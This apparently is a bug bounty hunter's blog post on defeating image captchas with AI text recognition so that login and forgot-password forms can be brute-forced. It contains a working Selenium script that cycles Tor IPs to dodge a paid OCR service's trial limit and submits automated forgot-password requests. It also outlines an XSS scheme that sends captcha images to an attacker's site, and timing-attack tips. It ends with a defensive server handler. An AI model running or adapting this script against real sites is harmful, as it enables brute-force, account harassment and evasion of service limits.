Bypassing Captcha

Is AI gonna change the future of hacking?

Eyaalgabay
5 min read · Feb 15, 2024

In the image below there is a form that everyone who uses the web sees almost every day: login, register, upload, send data, etc.

Every pentester or bug bounty hunter I know sees that form, and what comes to mind? Maybe SQLi, maybe user enumeration, maybe default credentials, and so on.

But for me there is a vulnerability just from visually looking at the form. Today's AI can simply read text from an image. Well, if simple AI today can read text from an image, then as an attacker we just create a brute-force script that downloads the image, converts the image to text and sends it with the request. A captcha is a security feature, which means that bypassing it is most likely a vulnerability.

But is it that simple to do? Well yes, I already did it 😂, so let's move on and see how you can do it too 😊.

Bypassing the captcha

Step 1

Check if the AI can actually read it and give it back to us as text.

Yeah, we did it! The first step was a success. We uploaded the image to an "image to text" converter and got our image back as text. That means it is possible to bypass this captcha.

Step 2

After we know it's possible, we need to automate the image-to-text upload and add it to the brute-force script.

Step 3

After we have a script that brute-forces and sends the code converted from the image, we need to know how consistent the script is. It may look pretty, but like humans, AI makes mistakes too. That means if the AI converts 1 image out of 10 wrongly, there is a 1-in-10 chance that the brute-force hit the right value but we missed it due to a wrong captcha code. So I recommend checking for an error such as "wrong captcha", and if a wrong-captcha error is shown, sending the same request again.

Other problems can be that it's hard to automate sending the image to the AI because of the time it takes, or maybe the AI has a rate limit or is a paid service. In my experience, if this is the case, most likely you need to find another AI.

Step 4

We successfully bypassed the captcha, so now we can do anything we could do if the website had no captcha at all.

Example of a Python script to bypass the captcha and send a lot of forgot-password requests:

```python
import requests
import os
import string

from selenium import webdriver
from selenium.webdriver.common.by import By
from time import sleep


def get_captcha(url):
    chrome = None
    try:
        # this command needs sudo to switch the tor ip
        os.system("sudo killall -HUP tor")
        # connect to the tor proxy
        # the api I use costs money after 5 tries, so I connect through tor to bypass the 5-try trial
        PROXY = "socks://localhost:9050"
        chrome_options = webdriver.ChromeOptions()
        chrome_options.add_argument('--proxy-server=%s' % PROXY)

        # open chrome (Selenium 4 takes the keyword `options`, not `chrome_options`)
        chrome = webdriver.Chrome(options=chrome_options)

        # you can set the path to /tmp/img.png
        img_path = "/tmp/captcha.png"

        # download the captcha image
        with open(img_path, "wb") as fh:
            fh.write(requests.get(url).content)

        # convert the captcha image to text
        chrome.get("https://brandfolder.com/workbench/extract-text-from-image")

        sleep(15)

        chrome.execute_script('window.document.getElementsByClassName("fsp-drop-pane__input")[0].id = "iamid";')
        chrome.find_element(By.ID, "iamid").send_keys(img_path)

        # if the internet or the computer is slow, change 40 to 60 or more
        sleep(40)

        captcha_code = chrome.find_element(By.ID, "extracted_text").text.strip()

        # check that the extracted captcha is valid: exactly 6 digits
        if len(captcha_code) == 6 and all(c in string.digits for c in captcha_code):
            return captcha_code
    except Exception:
        pass
    finally:
        # always close the browser, also on the success path
        if chrome is not None:
            chrome.quit()
    return None


b = webdriver.Chrome()

b.get("https://vulnerable.website/forgotPassword#/")

sleep(2)

b.find_element(By.ID, "email").send_keys("my@email.com")

b.find_element(By.XPATH, "/html/body/div[1]/div/main/div[2]/div[4]/button").click()

f = get_captcha(b.find_element(By.ID, "captcha_image").get_attribute("src"))
```

Automating form submission is not the only thing we can bypass

When people see a captcha, the first thing in their mind is that the captcha is probably there to defend against attacks such as DoS/DDoS, brute-force or enumeration.

But some people also use a captcha to defend themselves against attacks such as CSRF or sending a file via XSS, because they say that when an attacker achieves XSS he can't solve the captcha using JavaScript, so he can't automate the form.

But this is not the case anymore. As we proved, we can bypass the captcha, so we can create JavaScript code that sends the image to the attacker's website, the attacker's website sends back the captcha code, and the attacker executes the form or the action with that captcha code.

So the captcha bypass is not only used to get past the captcha when sending a form; it can be used in very creative ways to bypass the captcha for any use of captcha.

The last part is a theory that I have; it's not something I have done, but I am 100% sure it is possible to do.

I also believe that in the future AI will be able to bypass any captcha, including g-captcha (Google captcha).

Problems that I dealt with while doing it:

In some cases, the company understands that you can bypass the captcha and they simply don't care.

In some cases, the captcha is not readable by any AI that exists today.

In some cases, it may take 4 tries or more for the AI to get the captcha right.

In some cases, the website sends the same error if the captcha is wrong and if, for example, the password is wrong. As a result you can't know that the captcha read failed and that you need to resend the same credentials with a different captcha. In this case I recommend using a timing attack: check what the response time is for a captcha failure and what it is for a password failure. It's not 100% reliable, but it might work.

In some cases, I bypassed the captcha but there is a rate limit, so bypassing the captcha is not that useful.
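The signals this post depends on (a distinguishable wrong-captcha error or response time, and the freedom to resend the same credentials under a new captcha without cost) can all be removed on the server side. The handler below is an added example, not from the original post: it binds each captcha challenge to the client and consumes it on first use, evaluates every check before answering, counts captcha failures against the same attempt budget as credential failures, and pads the response to a fixed floor. The policy values, credential store and client identifiers are constructed assumptions.

```python
import hmac
import secrets
import time
from collections import defaultdict

# Hypothetical policy values for this example.
MAX_FAILURES = 5            # captcha failures count just like credential failures
MIN_RESPONSE_SECONDS = 0.1  # floor applied to every outcome, so timing cannot say which check failed
GENERIC_ERROR = "Invalid request"

USERS = {"alice": "correct-horse"}   # constructed credential store
_failures = defaultdict(int)         # client_id -> failed attempts so far
_challenges = {}                     # challenge_id -> (client_id, expected_code)


def issue_captcha(client_id, rendered_code):
    """Register a single-use captcha challenge bound to the client that requested it."""
    challenge_id = secrets.token_urlsafe(16)
    _challenges[challenge_id] = (client_id, rendered_code)
    return challenge_id


def failure_count(client_id):
    return _failures[client_id]


def _eq(a, b):
    return hmac.compare_digest(a.encode(), b.encode())


def login(client_id, challenge_id, captcha_answer, user, password):
    """Evaluate every check on every request and return one generic result."""
    start = time.monotonic()
    # Consume the challenge no matter what follows: a retried request needs a new image.
    bound_client, expected = _challenges.pop(challenge_id, (None, ""))
    captcha_ok = bound_client == client_id and _eq(captcha_answer, expected)
    creds_ok = _eq(password, USERS.get(user, ""))
    locked = _failures[client_id] >= MAX_FAILURES
    ok = captcha_ok and creds_ok and not locked
    if not ok:
        _failures[client_id] += 1   # a wrong captcha costs the client an attempt too
    # Pad to the floor so captcha failure, credential failure and success take the same time.
    time.sleep(max(0.0, MIN_RESPONSE_SECONDS - (time.monotonic() - start)))
    return {"ok": ok, "message": "OK" if ok else GENERIC_ERROR}
```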
